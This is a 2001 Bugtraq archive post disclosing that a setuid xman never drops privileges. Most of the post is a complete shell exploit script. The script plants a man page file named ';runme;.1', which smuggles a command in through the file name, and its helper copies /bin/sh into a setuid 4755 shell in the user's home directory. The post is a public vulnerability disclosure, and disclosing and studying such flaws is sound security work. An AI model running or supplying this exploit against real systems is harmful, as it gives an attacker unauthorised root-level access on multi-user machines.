Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

xman (suid) exploit, made easier.

From: <v9 () realhalo org>
Date: 17 Jul 2001 20:28:08 -0000
xman doesn't drop privileges anywheres in the 
program.  but, does support suid installation.  so, 
exploiting via a system call is much easier than the
buffer overflow in MANPATH, mentioned in another 
bugtraq posting.  here is an example of such an
exploitation possibility:

-- xxman.sh --

#!/bin/sh
# example of xman exploitation. xman
# supports privileges.  but, never
# drops them.
# Vade79 -> v9 () realhalo org -> realhalo.org. 
MANPATH=~/xmantest/
mkdir -p ~/xmantest/man1
cd ~/xmantest/man1
touch ';runme;.1'
cat << EOF >~/xmantest/runme
#!/bin/sh
cp /bin/sh ~/xmansh
chown `id -u` ~/xmansh
chmod 4755 ~/xmansh
EOF
chmod 755 ~/xmantest/runme
echo "click the ';runme;' selection," \
"exit.  then, check for ~/xmansh."
xman -bothshown -notopbox
rm -rf ~/xmantest

-- xxman.sh --

Vade79 -> v9 () realhalo org -> realhalo.org.
Previous By Date Next
Previous By Thread Next

Current thread: